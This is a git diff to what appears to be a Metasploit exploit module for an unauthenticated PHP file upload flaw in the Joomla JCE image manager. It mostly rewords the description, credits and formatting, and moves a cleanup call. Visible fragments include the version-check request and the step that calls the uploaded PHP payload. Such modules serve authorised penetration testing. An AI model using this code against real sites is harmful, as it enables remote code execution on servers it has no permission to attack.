diff --git a/modules/exploits/multi/http/joomla_comjce_imgmanager.rb b/modules/exploits/multi/http/joomla_comjce_imgmanager.rb index b6adbc2cf3..b2699c66d7 100644 --- a/modules/exploits/multi/http/joomla_comjce_imgmanager.rb +++ b/modules/exploits/multi/http/joomla_comjce_imgmanager.rb @@ -15,32 +15,33 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Joomla Component JCE File Upload Code Execution', + 'Name' => 'Joomla Component JCE File Upload Remote Code Execution', 'Description' => %q{ - This module exploits a vulnerability in the JCE component for Joomla! - could allow a unauthenticated remote attacker to upload arbitrary files, - caused by the fails to sufficiently sanitize user-supplied input. - Sending a specially-crafted HTTP request, a remote attacker could exploit - this vulnerability to upload a malicious PHP script, which could allow the - attacker to execute arbitrary PHP code on the vulnerable system. + This module exploits a vulnerability in the JCE component for Joomla!, which + could allow an unauthenticated remote attacker to upload arbitrary files, caused by the + fails to sufficiently sanitize user-supplied input. Sending specially-crafted HTTP + request, a remote attacker could exploit this vulnerability to upload a malicious PHP + script, which could allow the attacker to execute arbitrary PHP code on the vulnerable + system. This module has been tested successfully on the JCE Editor 1.5.71 and Joomla + 1.5.26. }, - 'Author' => [ 'Heyder Andrade ' ], + 'Author' => + [ + 'Unknown', # From AmnPardaz Security Group # Vulnerability discovery and PoC + 'Heyder Andrade ' # Metasploit module + ], 'License' => MSF_LICENSE, 'References' => [ ['BID', '49338'], - ['EDB', '17734'], + ['EDB', '17734'] ], 'Payload' => { 'Space' => 4000, # only to prevent error HTTP 414 (Request-URI Too Long) 'DisableNops' => true, 'BadChars' => "#", - 'Keys' => ['php'], - 'Compat' => - { - 'ConnectionType' => 'find', - }, + 'Keys' => ['php'] }, 'Platform' => 'php', 'Arch' => ARCH_PHP, @@ -60,21 +61,20 @@ class Metasploit3 < Msf::Exploit::Remote # check imgmanager version @uri_base = normalize_uri(target_uri.path.to_s, 'index.php') @vars_get_base = { - 'option'=> 'com_jce', - 'task' => 'plugin', - 'plugin'=> 'imgmanager', - 'file' => 'imgmanager' - } + 'option'=> 'com_jce', + 'task' => 'plugin', + 'plugin'=> 'imgmanager', + 'file' => 'imgmanager' + } print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}") - res = send_request_cgi( - { - 'uri' => @uri_base, - 'vars_get' => @vars_get_base, - 'method' => 'GET', - 'version' => '1.1' - - }) + res = send_request_cgi({ + 'uri' => @uri_base, + 'vars_get' => @vars_get_base, + 'method' => 'GET', + 'version' => '1.1' + }) + version = nil if (res and res.code == 200) res.body.match(%r{^\s+?Image\sManager\s:\s?(.*)<}) version = $1.nil? ? nil : $1 @@ -171,7 +171,6 @@ class Metasploit3 < Msf::Exploit::Remote payload = "#{@payload_name}.php" print_status("Calling payload: #{payload}") uri = normalize_uri(target_uri.path.to_s, "images", "stories", payload) - register_files_for_cleanup(payload) res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', @@ -186,6 +185,7 @@ class Metasploit3 < Msf::Exploit::Remote return if not check == Exploit::CheckCode::Vulnerable if upload_gif == :success if renamed? + register_files_for_cleanup("#{@payload_name}.php") call_payload end end